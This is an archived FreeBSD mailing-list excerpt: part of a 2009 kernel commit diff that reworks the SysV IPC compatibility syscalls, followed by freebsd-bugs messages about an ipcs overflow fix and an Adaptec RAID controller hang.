CP(dsbuf, dsbuf32, sem_otime); + CP(dsbuf, dsbuf32, sem_ctime); + error = copyout(&dsbuf32, PTRIN(arg.buf), sizeof(dsbuf32)); + break; + } + + if (error == 0) + td->td_retval[0] = rval; + return (error); } +#endif int freebsd32_semctl(struct thread *td, struct freebsd32_semctl_args *uap) @@ -1428,13 +1537,7 @@ freebsd32_semctl(struct thread *td, stru PTRIN_CP(dsbuf32, dsbuf, sem_base); CP(dsbuf32, dsbuf, sem_nsems); CP(dsbuf32, dsbuf, sem_otime); - CP(dsbuf32, dsbuf, sem_pad1); CP(dsbuf32, dsbuf, sem_ctime); - CP(dsbuf32, dsbuf, sem_pad2); - CP(dsbuf32, dsbuf, sem_pad3[0]); - CP(dsbuf32, dsbuf, sem_pad3[1]); - CP(dsbuf32, dsbuf, sem_pad3[2]); - CP(dsbuf32, dsbuf, sem_pad3[3]); semun.buf = &dsbuf; break; case GETALL: @@ -1454,17 +1557,12 @@ freebsd32_semctl(struct thread *td, stru switch (uap->cmd) { case SEM_STAT: case IPC_STAT: + bzero(&dsbuf32, sizeof(dsbuf32)); freebsd32_ipcperm_out(&dsbuf.sem_perm, &dsbuf32.sem_perm); PTROUT_CP(dsbuf, dsbuf32, sem_base); CP(dsbuf, dsbuf32, sem_nsems); CP(dsbuf, dsbuf32, sem_otime); - CP(dsbuf, dsbuf32, sem_pad1); CP(dsbuf, dsbuf32, sem_ctime); - CP(dsbuf, dsbuf32, sem_pad2); - CP(dsbuf, dsbuf32, sem_pad3[0]); - CP(dsbuf, dsbuf32, sem_pad3[1]); - CP(dsbuf, dsbuf32, sem_pad3[2]); - CP(dsbuf, dsbuf32, sem_pad3[3]); error = copyout(&dsbuf32, PTRIN(arg.buf), sizeof(dsbuf32)); break; } @@ -1478,6 +1576,8 @@ int freebsd32_msgsys(struct thread *td, struct freebsd32_msgsys_args *uap) { +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) switch (uap->which) { case 0: return (freebsd32_msgctl(td, @@ -1491,8 +1591,59 @@ freebsd32_msgsys(struct thread *td, stru default: return (msgsys(td, (struct msgsys_args *)uap)); } +#else + return (nosys(td, NULL)); +#endif } +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) +int +freebsd7_freebsd32_msgctl(struct thread *td, + struct freebsd7_freebsd32_msgctl_args *uap) +{ + struct msqid_ds msqbuf; + struct msqid_ds32_old msqbuf32; + int error; + + if (uap->cmd == IPC_SET) { + error = copyin(uap->buf, &msqbuf32, sizeof(msqbuf32)); + if (error) + return (error); + freebsd32_ipcperm_old_in(&msqbuf32.msg_perm, &msqbuf.msg_perm); + PTRIN_CP(msqbuf32, msqbuf, msg_first); + PTRIN_CP(msqbuf32, msqbuf, msg_last); + CP(msqbuf32, msqbuf, msg_cbytes); + CP(msqbuf32, msqbuf, msg_qnum); + CP(msqbuf32, msqbuf, msg_qbytes); + CP(msqbuf32, msqbuf, msg_lspid); + CP(msqbuf32, msqbuf, msg_lrpid); + CP(msqbuf32, msqbuf, msg_stime); + CP(msqbuf32, msqbuf, msg_rtime); + CP(msqbuf32, msqbuf, msg_ctime); + } + error = kern_msgctl(td, uap->msqid, uap->cmd, &msqbuf); + if (error) + return (error); + if (uap->cmd == IPC_STAT) { + bzero(&msqbuf32, sizeof(msqbuf32)); + freebsd32_ipcperm_old_out(&msqbuf.msg_perm, &msqbuf32.msg_perm); + PTROUT_CP(msqbuf, msqbuf32, msg_first); + PTROUT_CP(msqbuf, msqbuf32, msg_last); + CP(msqbuf, msqbuf32, msg_cbytes); + CP(msqbuf, msqbuf32, msg_qnum); + CP(msqbuf, msqbuf32, msg_qbytes); + CP(msqbuf, msqbuf32, msg_lspid); + CP(msqbuf, msqbuf32, msg_lrpid); + CP(msqbuf, msqbuf32, msg_stime); + CP(msqbuf, msqbuf32, msg_rtime); + CP(msqbuf, msqbuf32, msg_ctime); + error = copyout(&msqbuf32, uap->buf, sizeof(struct msqid_ds32)); + } + return (error); +} +#endif + int freebsd32_msgctl(struct thread *td, struct freebsd32_msgctl_args *uap) { @@ -1513,15 +1664,8 @@ freebsd32_msgctl(struct thread *td, stru CP(msqbuf32, msqbuf, msg_lspid); CP(msqbuf32, msqbuf, msg_lrpid); CP(msqbuf32, msqbuf, msg_stime); - CP(msqbuf32, msqbuf, msg_pad1); CP(msqbuf32, msqbuf, msg_rtime); - CP(msqbuf32, msqbuf, msg_pad2); CP(msqbuf32, msqbuf, msg_ctime); - CP(msqbuf32, msqbuf, msg_pad3); - CP(msqbuf32, msqbuf, msg_pad4[0]); - CP(msqbuf32, msqbuf, msg_pad4[1]); - CP(msqbuf32, msqbuf, msg_pad4[2]); - CP(msqbuf32, msqbuf, msg_pad4[3]); } error = kern_msgctl(td, uap->msqid, uap->cmd, &msqbuf); if (error) @@ -1536,15 +1680,8 @@ freebsd32_msgctl(struct thread *td, stru CP(msqbuf, msqbuf32, msg_lspid); CP(msqbuf, msqbuf32, msg_lrpid); CP(msqbuf, msqbuf32, msg_stime); - CP(msqbuf, msqbuf32, msg_pad1); CP(msqbuf, msqbuf32, msg_rtime); - CP(msqbuf, msqbuf32, msg_pad2); CP(msqbuf, msqbuf32, msg_ctime); - CP(msqbuf, msqbuf32, msg_pad3); - CP(msqbuf, msqbuf32, msg_pad4[0]); - CP(msqbuf, msqbuf32, msg_pad4[1]); - CP(msqbuf, msqbuf32, msg_pad4[2]); - CP(msqbuf, msqbuf32, msg_pad4[3]); error = copyout(&msqbuf32, uap->buf, sizeof(struct msqid_ds32)); } return (error); @@ -1588,6 +1725,8 @@ int freebsd32_shmsys(struct thread *td, struct freebsd32_shmsys_args *uap) { +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) switch (uap->which) { case 0: { /* shmat */ struct shmat_args ap; @@ -1623,8 +1762,99 @@ freebsd32_shmsys(struct thread *td, stru default: return (EINVAL); } +#else + return (nosys(td, NULL)); +#endif } +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) +int +freebsd7_freebsd32_shmctl(struct thread *td, + struct freebsd7_freebsd32_shmctl_args *uap) +{ + int error = 0; + union { + struct shmid_ds shmid_ds; + struct shm_info shm_info; + struct shminfo shminfo; + } u; + union { + struct shmid_ds32_old shmid_ds32; + struct shm_info32 shm_info32; + struct shminfo32 shminfo32; + } u32; + size_t sz; + + if (uap->cmd == IPC_SET) { + if ((error = copyin(uap->buf, &u32.shmid_ds32, + sizeof(u32.shmid_ds32)))) + goto done; + freebsd32_ipcperm_old_in(&u32.shmid_ds32.shm_perm, + &u.shmid_ds.shm_perm); + CP(u32.shmid_ds32, u.shmid_ds, shm_segsz); + CP(u32.shmid_ds32, u.shmid_ds, shm_lpid); + CP(u32.shmid_ds32, u.shmid_ds, shm_cpid); + CP(u32.shmid_ds32, u.shmid_ds, shm_nattch); + CP(u32.shmid_ds32, u.shmid_ds, shm_atime); + CP(u32.shmid_ds32, u.shmid_ds, shm_dtime); + CP(u32.shmid_ds32, u.shmid_ds, shm_ctime); + } + + error = kern_shmctl(td, uap->shmid, uap->cmd, (void *)&u, &sz); + if (error) + goto done; + + /* Cases in which we need to copyout */ + switch (uap->cmd) { + case IPC_INFO: + CP(u.shminfo, u32.shminfo32, shmmax); + CP(u.shminfo, u32.shminfo32, shmmin); + CP(u.shminfo, u32.shminfo32, shmmni); + CP(u.shminfo, u32.shminfo32, shmseg); + CP(u.shminfo, u32.shminfo32, shmall); + error = copyout(&u32.shminfo32, uap->buf, + sizeof(u32.shminfo32)); + break; + case SHM_INFO: + CP(u.shm_info, u32.shm_info32, used_ids); + CP(u.shm_info, u32.shm_info32, shm_rss); + CP(u.shm_info, u32.shm_info32, shm_tot); + CP(u.shm_info, u32.shm_info32, shm_swp); + CP(u.shm_info, u32.shm_info32, swap_attempts); + CP(u.shm_info, u32.shm_info32, swap_successes); + error = copyout(&u32.shm_info32, uap->buf, + sizeof(u32.shm_info32)); + break; + case SHM_STAT: + case IPC_STAT: + freebsd32_ipcperm_old_out(&u.shmid_ds.shm_perm, + &u32.shmid_ds32.shm_perm); + if (u.shmid_ds.shm_segsz > INT32_MAX) + u32.shmid_ds32.shm_segsz = INT32_MAX; + else + CP(u.shmid_ds, u32.shmid_ds32, shm_segsz); + CP(u.shmid_ds, u32.shmid_ds32, shm_lpid); + CP(u.shmid_ds, u32.shmid_ds32, shm_cpid); + CP(u.shmid_ds, u32.shmid_ds32, shm_nattch); + CP(u.shmid_ds, u32.shmid_ds32, shm_atime); + CP(u.shmid_ds, u32.shmid_ds32, shm_dtime); + CP(u.shmid_ds, u32.shmid_ds32, shm_ctime); + u32.shmid_ds32.shm_internal = 0; + error = copyout(&u32.shmid_ds32, uap->buf, + sizeof(u32.shmid_ds32)); + break; + } + +done: + if (error) { + /* Invalidate the return value */ + td->td_retval[0] = -1; + } + return (error); +} +#endif + int freebsd32_shmctl(struct thread *td, struct freebsd32_shmctl_args *uap) { @@ -1654,7 +1884,6 @@ freebsd32_shmctl(struct thread *td, stru CP(u32.shmid_ds32, u.shmid_ds, shm_atime); CP(u32.shmid_ds32, u.shmid_ds, shm_dtime); CP(u32.shmid_ds32, u.shmid_ds, shm_ctime); - PTRIN_CP(u32.shmid_ds32, u.shmid_ds, shm_internal); } error = kern_shmctl(td, uap->shmid, uap->cmd, (void *)&u, &sz); @@ -1686,14 +1915,16 @@ freebsd32_shmctl(struct thread *td, stru case IPC_STAT: freebsd32_ipcperm_out(&u.shmid_ds.shm_perm, &u32.shmid_ds32.shm_perm); - CP(u.shmid_ds, u32.shmid_ds32, shm_segsz); + if (u.shmid_ds.shm_segsz > INT32_MAX) + u32.shmid_ds32.shm_segsz = INT32_MAX; + else + CP(u.shmid_ds, u32.shmid_ds32, shm_segsz); CP(u.shmid_ds, u32.shmid_ds32, shm_lpid); CP(u.shmid_ds, u32.shmid_ds32, shm_cpid); CP(u.shmid_ds, u32.shmid_ds32, shm_nattch); CP(u.shmid_ds, u32.shmid_ds32, shm_atime); CP(u.shmid_ds, u32.shmid_ds32, shm_dtime); CP(u.shmid_ds, u32.shmid_ds32, shm_ctime); - PTROUT_CP(u.shmid_ds, u32.shmid_ds32, shm_internal); error = copyout(&u32.shmid_ds32, uap->buf, sizeof(u32.shmid_ds32)); break; Modified: head/sys/compat/freebsd32/syscalls.master ============================================================================== --- head/sys/compat/freebsd32/syscalls.master Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/compat/freebsd32/syscalls.master Wed Jun 24 21:10:52 2009 (r194910) @@ -405,15 +405,15 @@ ; The following were introduced with NetBSD/4.4Lite-2 ; They are initialized by thier respective modules/sysinits ; XXX PROBLEM!! -220 AUE_SEMCTL STD { int freebsd32_semctl(int semid, int semnum, \ +220 AUE_SEMCTL COMPAT7 { int freebsd32_semctl(int semid, int semnum, \ int cmd, union semun32 *arg); } 221 AUE_SEMGET NOPROTO { int semget(key_t key, int nsems, \ int semflg); } 222 AUE_SEMOP NOPROTO { int semop(int semid, struct sembuf *sops, \ u_int nsops); } 223 AUE_NULL UNIMPL semconfig -224 AUE_MSGCTL STD { int freebsd32_msgctl(int msqid, int cmd, \ - struct msqid_ds32 *buf); } +224 AUE_MSGCTL COMPAT7 { int freebsd32_msgctl(int msqid, int cmd, \ + struct msqid_ds32_old *buf); } 225 AUE_MSGGET NOPROTO { int msgget(key_t key, int msgflg); } 226 AUE_MSGSND STD { int freebsd32_msgsnd(int msqid, void *msgp, \ size_t msgsz, int msgflg); } @@ -421,8 +421,8 @@ size_t msgsz, long msgtyp, int msgflg); } 228 AUE_SHMAT NOPROTO { int shmat(int shmid, void *shmaddr, \ int shmflg); } -229 AUE_SHMCTL STD { int freebsd32_shmctl(int shmid, int cmd, \ - struct shmid_ds *buf); } +229 AUE_SHMCTL COMPAT7 { int freebsd32_shmctl(int shmid, int cmd, \ + struct shmid_ds32_old *buf); } 230 AUE_SHMDT NOPROTO { int shmdt(void *shmaddr); } 231 AUE_SHMGET NOPROTO { int shmget(key_t key, int size, \ int shmflg); } @@ -894,3 +894,9 @@ unsigned int iovcnt, int flags); } 508 AUE_NULL NOPROTO { int jail_remove(int jid); } 509 AUE_CLOSEFROM NOPROTO { int closefrom(int lowfd); } +510 AUE_SEMCTL STD { int freebsd32_semctl(int semid, int semnum, \ + int cmd, union semun32 *arg); } +511 AUE_MSGCTL STD { int freebsd32_msgctl(int msqid, int cmd, \ + struct msqid_ds32 *buf); } +512 AUE_SHMCTL STD { int freebsd32_shmctl(int shmid, int cmd, \ + struct shmid_ds32 *buf); } Modified: head/sys/compat/linux/linux_ipc.c ============================================================================== --- head/sys/compat/linux/linux_ipc.c Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/compat/linux/linux_ipc.c Wed Jun 24 21:10:52 2009 (r194910) @@ -230,23 +230,26 @@ linux_to_bsd_shmid_ds(struct l_shmid_ds bsp->shm_atime = lsp->shm_atime; bsp->shm_dtime = lsp->shm_dtime; bsp->shm_ctime = lsp->shm_ctime; - /* this goes (yet) SOS */ - bsp->shm_internal = PTRIN(lsp->private3); } static void bsd_to_linux_shmid_ds(struct shmid_ds *bsp, struct l_shmid_ds *lsp) { bsd_to_linux_ipc_perm(&bsp->shm_perm, &lsp->shm_perm); - lsp->shm_segsz = bsp->shm_segsz; + if (bsp->shm_segsz > INT_MAX) + lsp->shm_segsz = INT_MAX; + else + lsp->shm_segsz = bsp->shm_segsz; lsp->shm_lpid = bsp->shm_lpid; lsp->shm_cpid = bsp->shm_cpid; - lsp->shm_nattch = bsp->shm_nattch; + if (bsp->shm_nattch > SHRT_MAX) + lsp->shm_nattch = SHRT_MAX; + else + lsp->shm_nattch = bsp->shm_nattch; lsp->shm_atime = bsp->shm_atime; lsp->shm_dtime = bsp->shm_dtime; lsp->shm_ctime = bsp->shm_ctime; - /* this goes (yet) SOS */ - lsp->private3 = PTROUT(bsp->shm_internal); + lsp->private3 = 0; } static void @@ -424,6 +427,15 @@ linux_shmid_pushdown(l_int ver, struct l { struct l_shmid64_ds linux_shmid64; + /* + * XXX: This is backwards and loses information in shm_nattch + * and shm_segsz. We should probably either expose the BSD + * shmid structure directly and convert it to either the + * non-64 or 64 variant directly or the code should always + * convert to the 64 variant and then truncate values into the + * non-64 variant if needed since the 64 variant has more + * precision. + */ if (ver == LINUX_IPC_64) { bzero(&linux_shmid64, sizeof(linux_shmid64)); Modified: head/sys/compat/svr4/svr4_ipc.c ============================================================================== --- head/sys/compat/svr4/svr4_ipc.c Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/compat/svr4/svr4_ipc.c Wed Jun 24 21:10:52 2009 (r194910) @@ -169,13 +169,12 @@ bsd_to_svr4_semid_ds(bds, sds) const struct semid_ds *bds; struct svr4_semid_ds *sds; { + bzero(sds, sizeof(*sds)); bsd_to_svr4_ipc_perm(&bds->sem_perm, &sds->sem_perm); sds->sem_base = (struct svr4_sem *) bds->sem_base; sds->sem_nsems = bds->sem_nsems; sds->sem_otime = bds->sem_otime; - sds->sem_pad1 = bds->sem_pad1; sds->sem_ctime = bds->sem_ctime; - sds->sem_pad2 = bds->sem_pad2; } static void @@ -187,9 +186,7 @@ svr4_to_bsd_semid_ds(sds, bds) bds->sem_base = (struct sem *) bds->sem_base; bds->sem_nsems = sds->sem_nsems; bds->sem_otime = sds->sem_otime; - bds->sem_pad1 = sds->sem_pad1; bds->sem_ctime = sds->sem_ctime; - bds->sem_pad2 = sds->sem_pad2; } struct svr4_sys_semctl_args { @@ -350,6 +347,7 @@ bsd_to_svr4_msqid_ds(bds, sds) const struct msqid_ds *bds; struct svr4_msqid_ds *sds; { + bzero(sds, sizeof(*sds)); bsd_to_svr4_ipc_perm(&bds->msg_perm, &sds->msg_perm); sds->msg_first = (struct svr4_msg *) bds->msg_first; sds->msg_last = (struct svr4_msg *) bds->msg_last; @@ -359,18 +357,8 @@ bsd_to_svr4_msqid_ds(bds, sds) sds->msg_lspid = bds->msg_lspid; sds->msg_lrpid = bds->msg_lrpid; sds->msg_stime = bds->msg_stime; - sds->msg_pad1 = bds->msg_pad1; sds->msg_rtime = bds->msg_rtime; - sds->msg_pad2 = bds->msg_pad2; sds->msg_ctime = bds->msg_ctime; - sds->msg_pad3 = bds->msg_pad3; - - /* use the padding for the rest of the fields */ - { - const short *pad = (const short *) bds->msg_pad4; - sds->msg_cv = pad[0]; - sds->msg_qnum_cv = pad[1]; - } } static void @@ -387,18 +375,8 @@ svr4_to_bsd_msqid_ds(sds, bds) bds->msg_lspid = sds->msg_lspid; bds->msg_lrpid = sds->msg_lrpid; bds->msg_stime = sds->msg_stime; - bds->msg_pad1 = sds->msg_pad1; bds->msg_rtime = sds->msg_rtime; - bds->msg_pad2 = sds->msg_pad2; bds->msg_ctime = sds->msg_ctime; - bds->msg_pad3 = sds->msg_pad3; - - /* use the padding for the rest of the fields */ - { - short *pad = (short *) bds->msg_pad4; - pad[0] = sds->msg_cv; - pad[1] = sds->msg_qnum_cv; - } } struct svr4_sys_msgsnd_args { @@ -543,20 +521,18 @@ bsd_to_svr4_shmid_ds(bds, sds) const struct shmid_ds *bds; struct svr4_shmid_ds *sds; { + bzero(sds, sizeof(*sds)); bsd_to_svr4_ipc_perm(&bds->shm_perm, &sds->shm_perm); sds->shm_segsz = bds->shm_segsz; sds->shm_lkcnt = 0; sds->shm_lpid = bds->shm_lpid; sds->shm_cpid = bds->shm_cpid; - sds->shm_amp = bds->shm_internal; + sds->shm_amp = 0; sds->shm_nattch = bds->shm_nattch; sds->shm_cnattch = 0; sds->shm_atime = bds->shm_atime; - sds->shm_pad1 = 0; sds->shm_dtime = bds->shm_dtime; - sds->shm_pad2 = 0; sds->shm_ctime = bds->shm_ctime; - sds->shm_pad3 = 0; } static void @@ -568,7 +544,6 @@ svr4_to_bsd_shmid_ds(sds, bds) bds->shm_segsz = sds->shm_segsz; bds->shm_lpid = sds->shm_lpid; bds->shm_cpid = sds->shm_cpid; - bds->shm_internal = sds->shm_amp; bds->shm_nattch = sds->shm_nattch; bds->shm_atime = sds->shm_atime; bds->shm_dtime = sds->shm_dtime; Modified: head/sys/i386/ibcs2/ibcs2_ipc.c ============================================================================== --- head/sys/i386/ibcs2/ibcs2_ipc.c Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/i386/ibcs2/ibcs2_ipc.c Wed Jun 24 21:10:52 2009 (r194910) @@ -415,7 +415,10 @@ struct ibcs2_shmid_ds *ibp; ibp->shm_segsz = bp->shm_segsz; ibp->shm_lpid = bp->shm_lpid; ibp->shm_cpid = bp->shm_cpid; - ibp->shm_nattch = bp->shm_nattch; + if (bp->shm_nattch > SHRT_MAX) + ibp->shm_nattch = SHRT_MAX; + else + ibp->shm_nattch = bp->shm_nattch; ibp->shm_cnattch = 0; /* ignored anyway */ ibp->shm_atime = bp->shm_atime; ibp->shm_dtime = bp->shm_dtime; @@ -436,7 +439,6 @@ struct shmid_ds *bp; bp->shm_atime = ibp->shm_atime; bp->shm_dtime = ibp->shm_dtime; bp->shm_ctime = ibp->shm_ctime; - bp->shm_internal = (void *)0; /* ignored anyway */ return; } Modified: head/sys/kern/syscalls.master ============================================================================== --- head/sys/kern/syscalls.master Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/kern/syscalls.master Wed Jun 24 21:10:52 2009 (r194910) @@ -417,15 +417,15 @@ ; ; The following were introduced with NetBSD/4.4Lite-2 -220 AUE_SEMCTL NOSTD { int __semctl(int semid, int semnum, \ - int cmd, union semun *arg); } +220 AUE_SEMCTL COMPAT7|NOSTD { int __semctl(int semid, int semnum, \ + int cmd, union semun_old *arg); } 221 AUE_SEMGET NOSTD { int semget(key_t key, int nsems, \ int semflg); } 222 AUE_SEMOP NOSTD { int semop(int semid, struct sembuf *sops, \ size_t nsops); } 223 AUE_NULL UNIMPL semconfig -224 AUE_MSGCTL NOSTD { int msgctl(int msqid, int cmd, \ - struct msqid_ds *buf); } +224 AUE_MSGCTL COMPAT7|NOSTD { int msgctl(int msqid, int cmd, \ + struct msqid_ds_old *buf); } 225 AUE_MSGGET NOSTD { int msgget(key_t key, int msgflg); } 226 AUE_MSGSND NOSTD { int msgsnd(int msqid, const void *msgp, \ size_t msgsz, int msgflg); } @@ -433,8 +433,8 @@ size_t msgsz, long msgtyp, int msgflg); } 228 AUE_SHMAT NOSTD { int shmat(int shmid, const void *shmaddr, \ int shmflg); } -229 AUE_SHMCTL NOSTD { int shmctl(int shmid, int cmd, \ - struct shmid_ds *buf); } +229 AUE_SHMCTL COMPAT7|NOSTD { int shmctl(int shmid, int cmd, \ + struct shmid_ds_old *buf); } 230 AUE_SHMDT NOSTD { int shmdt(const void *shmaddr); } 231 AUE_SHMGET NOSTD { int shmget(key_t key, size_t size, \ int shmflg); } @@ -904,5 +904,11 @@ unsigned int iovcnt, int flags); } 508 AUE_NULL STD { int jail_remove(int jid); } 509 AUE_CLOSEFROM STD { int closefrom(int lowfd); } +510 AUE_SEMCTL NOSTD { int __semctl(int semid, int semnum, \ + int cmd, union semun *arg); } +511 AUE_MSGCTL NOSTD { int msgctl(int msqid, int cmd, \ + struct msqid_ds *buf); } +512 AUE_SHMCTL NOSTD { int shmctl(int shmid, int cmd, \ + struct shmid_ds *buf); } ; Please copy any additions and changes to the following compatability tables: ; sys/compat/freebsd32/syscalls.master Modified: head/sys/kern/sysv_ipc.c ============================================================================== --- head/sys/kern/sysv_ipc.c Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/kern/sysv_ipc.c Wed Jun 24 21:10:52 2009 (r194910) @@ -36,6 +36,7 @@ #include __FBSDID("$FreeBSD$"); +#include "opt_compat.h" #include "opt_sysvipc.h" #include @@ -147,3 +148,33 @@ ipcperm(struct thread *td, struct ipc_pe else return (EACCES); } + +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) +void +ipcperm_old2new(struct ipc_perm_old *old, struct ipc_perm *new) +{ + + new->cuid = old->cuid; + new->cgid = old->cgid; + new->uid = old->uid; + new->gid = old->gid; + new->mode = old->mode; + new->seq = old->seq; + new->key = old->key; +} + +void +ipcperm_new2old(struct ipc_perm *new, struct ipc_perm_old *old) *** DIFF OUTPUT TRUNCATED AT 1000 LINES *** _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 21:36:11 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D857F1065674; Wed, 24 Jun 2009 21:36:11 +0000 (UTC) (envelope-from jhb@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id AE7238FC1F; Wed, 24 Jun 2009 21:36:11 +0000 (UTC) (envelope-from jhb@FreeBSD.org) Received: from freefall.freebsd.org (jhb@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OLaBp6012781; Wed, 24 Jun 2009 21:36:11 GMT (envelope-from jhb@freefall.freebsd.org) Received: (from jhb@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5OLaB5k012777; Wed, 24 Jun 2009 21:36:11 GMT (envelope-from jhb) Date: Wed, 24 Jun 2009 21:36:11 GMT Message-Id: <200906242136.n5OLaB5k012777@freefall.freebsd.org> To: peter.keel@hostpoint.ch, jhb@FreeBSD.org, freebsd-bugs@FreeBSD.org From: jhb@FreeBSD.org Cc: Subject: Re: bin/129855: [patch] ipcs(1) integer overflow with UIDs bigger than 65535 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 21:36:12 -0000 Synopsis: [patch] ipcs(1) integer overflow with UIDs bigger than 65535 State-Changed-From-To: open->closed State-Changed-By: jhb State-Changed-When: Wed Jun 24 21:35:58 UTC 2009 State-Changed-Why: This will be fixed in 8.0. http://www.freebsd.org/cgi/query-pr.cgi?pr=129855 From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 05:41:35 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 0BCEC106564A for ; Thu, 25 Jun 2009 05:41:35 +0000 (UTC) (envelope-from yuri.gorchakov@point-group.ru) Received: from mail.point-group.ru (point-group.ru [83.172.40.209]) by mx1.freebsd.org (Postfix) with ESMTP id F29218FC19 for ; Thu, 25 Jun 2009 05:41:29 +0000 (UTC) (envelope-from yuri.gorchakov@point-group.ru) Received: from localhost (point-group.ru [83.172.40.209]) by mail.point-group.ru (Mail System) with ESMTP id 3F7137EA8526 for ; Thu, 25 Jun 2009 12:23:06 +0700 (NOVST) X-Virus-Scanned: Antivirus and antispam scanner at point-group.ru Received: from alienware.local (docsis-79-136-173-96.tomtelnet.ru [79.136.173.96]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) (Authenticated sender: yuri.gorchakov) by mail.point-group.ru (Mail System) with ESMTPSA id C99EB7EA851C for ; Thu, 25 Jun 2009 12:23:01 +0700 (NOVST) Message-ID: <4A4309B4.1060203@point-group.ru> Date: Thu, 25 Jun 2009 12:23:00 +0700 From: Yuri Gorchakov User-Agent: Thunderbird 2.0.0.21 (X11/20090504) MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.org X-Enigmail-Version: 0.95.7 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Cc: Subject: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 05:41:36 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dear FreeBSD team, this is a comment to kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix (http://www.freebsd.org/cgi/query-pr.cgi?pr=135408) The suggested fix does not fix the problem. Please note! May be the post should be corrected? See the original message to the author of the PR. Yuri G. - -------- Original Message -------- Subject: Adaptec 5405 + FreeBSD issue Date: Thu, 25 Jun 2009 12:12:51 +0700 From: Yuri Gorchakov To: freebsdusb@bindone.de Dear Michael Gmelin, I have the same issue with FreeBSD 7.2 amd64 and Adaptec 5405 controller as posted at http://www.freebsd.org/cgi/query-pr.cgi?pr=135408 I have tried the suggested fix by setting sys/dev/aac/aacvar.h AAC_CMD_TIMEOUT to 45 seconds and it did set the hang moment a little bit higher (I was able to run make -j12 buildworld twice and blogbench with 10 iterations), but didn't fix the problem completely - the controller died while running blogbench with 100 iterations. Have you managed to find the solution on your systems? Yuri. - -- С уважением, Горчаков Юрий. Группа компаний "POiNT". Email: yuri.gorchakov@point-group.ru Web: http://point-group.ru Ð”Ð»Ñ Ð¿ÐµÑ€ÐµÐ´Ð°Ñ‡Ð¸ конфиденциальной информации мне вы можете воÑпользоватьÑÑ ÐºÐ»ÑŽÑ‡Ð¾Ð¼ ÑˆÐ¸Ñ„Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ PGP, Ñкачав его http://point-group.ru/yuri.gorchakov@point-group.ru.pub.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.11 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpDCbQACgkQj73gq1Rwjyh6QgCeOO8sGR/u/j9GHxBjqsy8Varn iJYAn3mmiTFUFGSbpMMi2R6NKcdheNdh =x+i2 -----END PGP SIGNATURE----- From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 06:20:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D5F4D106564A for ; Thu, 25 Jun 2009 06:20:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id AA0788FC23 for ; Thu, 25 Jun 2009 06:20:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5P6K3TG011497 for ; Thu, 25 Jun 2009 06:20:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5P6K3uo011496; Thu, 25 Jun 2009 06:20:03 GMT (envelope-from gnats) Date: Thu, 25 Jun 2009 06:20:03 GMT Message-Id: <200906250620.n5P6K3uo011496@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: Mark Linimon Cc: Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix X-BeenThere: 